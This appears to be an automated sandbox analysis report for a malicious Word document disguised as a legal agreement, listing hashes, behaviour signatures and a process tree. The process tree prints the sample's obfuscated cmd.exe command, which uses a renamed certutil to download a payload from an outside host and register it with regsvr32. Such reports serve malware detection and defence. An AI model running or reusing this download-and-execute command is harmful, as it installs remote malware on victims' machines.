Analysis
-
max time kernel
146s -
max time network
23s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
31-07-2020 13:03
Static task
static1
Behavioral task
behavioral1
Sample
legal agreement_07.30.2020.doc
Resource
win7v200722
Behavioral task
behavioral2
Sample
legal agreement_07.30.2020.doc
Resource
win10v200722
General
-
Target
legal agreement_07.30.2020.doc
-
Size
103KB
-
MD5
b3b0dffa00f1a93dd4f4069d87f43dd3
-
SHA1
756fe15d649645f5d9c3ef60dcd6d6ba5384633e
-
SHA256
e67aa7a4192ca035c6c52a6afaf1b03058b9baa6fde616db3dad9d8d3d4c24cc
-
SHA512
fe57b509a42cf017bc17d7b84d69ffb9c8de4e7240ef4056caf4e91fda39fee16b0019a4c6fba521f7278d99d857b9ef1374329177a70cc5b6ccc1bf44fd0202
Malware Config
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 844 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1036 844 cmd.exe WINWORD.EXE -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 1036 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1036 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
WINWORD.EXEpid process 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE 844 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 844 wrote to memory of 1036 844 WINWORD.EXE cmd.exe PID 844 wrote to memory of 1036 844 WINWORD.EXE cmd.exe PID 844 wrote to memory of 1036 844 WINWORD.EXE cmd.exe PID 1036 wrote to memory of 1532 1036 cmd.exe 1.exe PID 1036 wrote to memory of 1532 1036 cmd.exe 1.exe PID 1036 wrote to memory of 1532 1036 cmd.exe 1.exe -
Executes dropped EXE 1 IoCs
Processes:
1.exepid process 1532 1.exe -
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\1.exeC:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp3⤵
- Executes dropped EXE